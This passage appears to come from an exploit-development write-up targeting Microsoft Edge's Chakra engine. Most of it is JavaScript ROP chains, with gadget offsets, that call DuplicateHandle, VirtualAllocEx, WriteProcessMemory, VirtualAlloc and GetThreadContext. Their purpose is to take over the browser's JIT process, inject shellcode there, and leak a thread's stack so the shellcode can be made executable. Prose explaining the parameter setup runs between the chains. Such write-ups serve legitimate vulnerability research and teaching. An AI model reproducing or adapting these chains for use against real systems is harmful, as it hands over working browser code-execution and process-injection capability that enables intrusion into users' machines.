write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address, which points to the value we want to write: the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

This call is pretty straightforward, and since there are only four parameters we don’t have to write any parameters to the stack.
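To make the register-versus-stack split concrete, here is a minimal sketch of where each argument lives at the moment a chain jumps into an API. The helper names `argLocation` and `describeCall` are hypothetical and only for illustration; the RSP+0x28 starting offset is the one noted in the chain comments (fake return address plus 0x20 bytes of shadow space).

```javascript
// Windows x64 passes the first four integer/pointer arguments in registers.
const REGISTER_ARGS = ["RCX", "RDX", "R8", "R9"];

// Hypothetical helper: location of the 0-based argument `index` on entry to
// an API reached via `jmp rax`. At that point [RSP] holds the fake return
// address, followed by 0x20 bytes of shadow space, so stack arguments start
// at RSP+0x28.
function argLocation(index) {
    if (index < REGISTER_ARGS.length) {
        return REGISTER_ARGS[index];
    }
    const offset = 0x28 + (index - REGISTER_ARGS.length) * 8;
    return "RSP+0x" + offset.toString(16);
}

// Hypothetical helper: pair each parameter name with its location.
function describeCall(paramNames) {
    return paramNames.map((name, i) => name + " -> " + argLocation(i));
}

const virtualAllocParams = [
    "lpAddress", "dwSize", "flAllocationType", "flProtect"
];
const createRemoteThreadParams = [
    "hProcess", "lpThreadAttributes", "dwStackSize", "lpStartAddress",
    "lpParameter", "dwCreationFlags", "lpThreadId"
];

console.log(describeCall(virtualAllocParams).join("\n"));
console.log(describeCall(createRemoteThreadParams).join("\n"));
```

All four VirtualAlloc parameters land in registers, whereas the last three CreateRemoteThread parameters fall at RSP+0x28, RSP+0x30, and RSP+0x38, matching the comments in the CreateRemoteThread chain.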

We start out with the flProtect parameter (again, we have to make sure RAX points to valid, readable memory because of a gadget which performs cmp r8d, [rax]). We can set a breakpoint on jmp rax, as we have seen, to reach our first gadget within the VirtualAlloc ROP chain.

The first parameter we will configure is flProtect, which we set to 4, or PAGE_READWRITE.
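The gadget that loads R9 ends in add rsp, 0x28 ; ret, which is why the chain follows it with five padding values. The sketch below models that layout with plain arrays rather than real write64() calls; `paddingQwords` and `layoutGadget` are hypothetical helpers, and the strings are labels, not addresses.

```javascript
// Filler value the chains use for skipped stack slots.
const PADDING = "0x4141414141414141";

// Number of 8-byte stack slots skipped by a gadget ending in `add rsp, N ; ret`.
function paddingQwords(addRspBytes) {
    if (addRspBytes % 8 !== 0) {
        throw new RangeError("add rsp adjustment must be a multiple of 8");
    }
    return addRspBytes / 8;
}

// Hypothetical helper: the stack slots one gadget occupies, in order:
// the gadget address, any values it pops, then padding for `add rsp, N`.
function layoutGadget(gadget, poppedValues, addRspBytes) {
    const padding = new Array(paddingQwords(addRspBytes)).fill(PADDING);
    return [gadget, ...poppedValues, ...padding];
}

// The flProtect (R9) setup from the VirtualAlloc chain, as labels.
const flProtectSetup = [
    ...layoutGadget("pop rax ; ret", ["chakra.dll .data pointer"], 0),
    ...layoutGadget("pop rcx ; ret", ["0x4 (PAGE_READWRITE)"], 0),
    ...layoutGadget("mov r9, rcx ; cmp r8d, [rax] ; ... ; add rsp, 0x28 ; ret", [], 0x28)
];

flProtectSetup.forEach((entry, i) => {
    console.log("+0x" + (i * 8).toString(16) + ": " + entry);
});
```

The same arithmetic explains the other padding runs in the chains: add rsp, 0x38 skips seven slots and add rsp, 0x48 skips nine.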

Our call to VirtualAlloc is now in this state:

VirtualAlloc(
	-
	-
	-
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

The next parameter we will address is lpAddress - which we will set to NULL.

This brings our call to the following state:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	-
	-
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

Next up is our dwSize parameter. We showed earlier how to calculate the size of a CONTEXT structure, and so we will use a value of 0x4d0.

This brings us to the following state - with only one more parameter to deal with:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	-
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

The last parameter we need to set is flAllocationType, which will be a value of 0x3000.

This completes our parameters:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	MEM_COMMIT | MEM_RESERVE,	// Make sure this memory is committed and reserved
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);
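As a quick sanity check on the values used above, the following sketch computes the four VirtualAlloc arguments and splits each into the low and high 32-bit halves that the chains pass to write64(). The constants are the documented Windows values; `toLoHi` is a hypothetical helper, not part of the exploit.

```javascript
// Documented Windows memory constants.
const MEM_COMMIT = 0x1000;
const MEM_RESERVE = 0x2000;
const PAGE_READWRITE = 0x04;

// Size of a CONTEXT structure on x64, as used in the chain.
const SIZEOF_CONTEXT = 0x4d0;

// Hypothetical helper: split a non-negative integer (below 2^53) into
// [low 32 bits, high 32 bits], the form the chains hand to write64().
function toLoHi(value) {
    const lo = value % 0x100000000;
    const hi = Math.floor(value / 0x100000000);
    return [lo, hi];
}

const virtualAllocArgs = {
    lpAddress: 0,                                // NULL: let the system choose
    dwSize: SIZEOF_CONTEXT,
    flAllocationType: MEM_COMMIT | MEM_RESERVE,  // 0x3000
    flProtect: PAGE_READWRITE
};

for (const [name, value] of Object.entries(virtualAllocArgs)) {
    const [lo, hi] = toLoHi(value);
    console.log(name + ": lo=0x" + lo.toString(16) + " hi=0x" + hi.toString(16));
}
```

Every value here fits in 32 bits, so the high half is always zero, which is why the corresponding write64() calls pass 0x00000000 as their final argument.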

Lastly, we execute our function call, and the return value should be a pointer to a block of memory which we will use in our call to GetThreadContext.

As part of our next ROP chain, calling GetThreadContext, we will preserve this address as we need to write a value into it before we make our call to GetThreadContext.

GetThreadContext ROP Chain

As mentioned earlier, now that our shellcode is in the JIT process, we want to inject one last item: a final ROP chain that will mark our shellcode as RWX. ROP requires stack control, since each gadget returns to the stack and we need to control what each gadget returns into (our next ROP gadget). Since we already control a thread in the remote JIT process (by creating one), we can use the Windows API GetThreadContext to dump the CPU register state of that thread, which includes the RSP register, or the stack pointer. In other words, GetThreadContext lets us leak the stack address of any thread we hold a handle to. Luckily for us, as mentioned, CreateRemoteThread returned a handle to us - meaning we have a handle to a thread within the JIT process that we control.

However, let’s quickly look at GetThreadContext and its documentation, specifically the lpContext parameter:

A pointer to a CONTEXT structure (such as ARM64_NT_CONTEXT) that receives the appropriate context of the specified thread. The value of the ContextFlags member of this structure specifies which portions of a thread’s context are retrieved. The CONTEXT structure is highly processor specific. Refer to the WinNT.h header file for processor-specific definitions of this structures and any alignment requirements.

As we can see, it is a slight oversimplification to say that we only need to supply GetThreadContext with an empty buffer to fill. When calling GetThreadContext, one needs to fill in CONTEXT.ContextFlags in order to tell the OS how much of the thread’s context (e.g. CPU register state) we would like to receive. In our case, we want to retrieve all of the registers (a full 0x4d0-byte CONTEXT structure).

Taking a look at ReactOS we can see the possible values we can supply here:

If we OR all of these values together to form CONTEXT_ALL, we get a value of 0x10001f. This means that before we call GetThreadContext, we need to set the ContextFlags member of our CONTEXT structure (which is really our VirtualAlloc allocation) to 0x10001f.
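For reference, the arithmetic can be reproduced with the AMD64 flag values from WinNT.h. This is a small sketch rather than part of the exploit. Note that the flags are combined with a bitwise OR, because every flag carries the same CONTEXT_AMD64 architecture bit and a plain sum would count that bit five times.

```javascript
// AMD64 context flag values as defined in WinNT.h.
const CONTEXT_AMD64           = 0x00100000;
const CONTEXT_CONTROL         = CONTEXT_AMD64 | 0x01;
const CONTEXT_INTEGER         = CONTEXT_AMD64 | 0x02;
const CONTEXT_SEGMENTS        = CONTEXT_AMD64 | 0x04;
const CONTEXT_FLOATING_POINT  = CONTEXT_AMD64 | 0x08;
const CONTEXT_DEBUG_REGISTERS = CONTEXT_AMD64 | 0x10;

const contextFlagValues = [
    CONTEXT_CONTROL,
    CONTEXT_INTEGER,
    CONTEXT_SEGMENTS,
    CONTEXT_FLOATING_POINT,
    CONTEXT_DEBUG_REGISTERS
];

// Bitwise OR of every flag: the shared architecture bit is kept once.
const CONTEXT_ALL = contextFlagValues.reduce((acc, flag) => acc | flag, 0);

// Arithmetic sum, shown only for contrast: the architecture bit is counted
// five times, so this is NOT a valid ContextFlags value.
const naiveSum = contextFlagValues.reduce((acc, flag) => acc + flag, 0);

console.log("CONTEXT_ALL = 0x" + CONTEXT_ALL.toString(16));
console.log("naive sum   = 0x" + naiveSum.toString(16));
```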

Looking at WinDbg, this value is located at CONTEXT + 0x30.

This means that before we call GetThreadContext, we need to write to our buffer, which we allocated with VirtualAlloc (we will pass this into GetThreadContext to act as our “CONTEXT” structure), the value 0x10001f at an offset of 0x30 within this buffer. Here is how this looks:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)			// The buffer to receive the CONTEXT structure
);
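The buffer preparation can be modelled outside the exploit with a DataView standing in for the VirtualAlloc allocation. This is only a sketch: the names below are hypothetical, and the Rsp offset of 0x98 is taken from the AMD64 CONTEXT layout in WinNT.h (it can be confirmed in WinDbg with dt ntdll!_CONTEXT).

```javascript
const CONTEXT_SIZE = 0x4d0;          // sizeof(CONTEXT) on x64
const CONTEXT_FLAGS_OFFSET = 0x30;   // CONTEXT.ContextFlags (a DWORD)
const CONTEXT_RSP_OFFSET = 0x98;     // CONTEXT.Rsp (assumption from WinNT.h)
const CONTEXT_ALL_FLAGS = 0x10001f;

// Stand-in for the zero-initialised memory returned by VirtualAlloc.
const contextBuffer = new DataView(new ArrayBuffer(CONTEXT_SIZE));

// Equivalent of "VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL":
// a little-endian 32-bit write at offset 0x30.
contextBuffer.setUint32(CONTEXT_FLAGS_OFFSET, CONTEXT_ALL_FLAGS, true);

function readContextFlags(view) {
    return view.getUint32(CONTEXT_FLAGS_OFFSET, true);
}

// After a real GetThreadContext call this slot would hold the thread's
// stack pointer; in this simulation it is still zero.
function readRsp(view) {
    return view.getBigUint64(CONTEXT_RSP_OFFSET, true);
}

console.log("ContextFlags = 0x" + readContextFlags(contextBuffer).toString(16));
console.log("Rsp          = 0x" + readRsp(contextBuffer).toString(16));
```

In the actual chain the same effect is achieved with a single 8-byte write to the allocation at offset 0x30 before GetThreadContext is called.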

Let’s see how all of this looks via ROP (with previous chains for continuity):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager::s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtualAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the future cmp r8d, [rax] gadget reads from a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
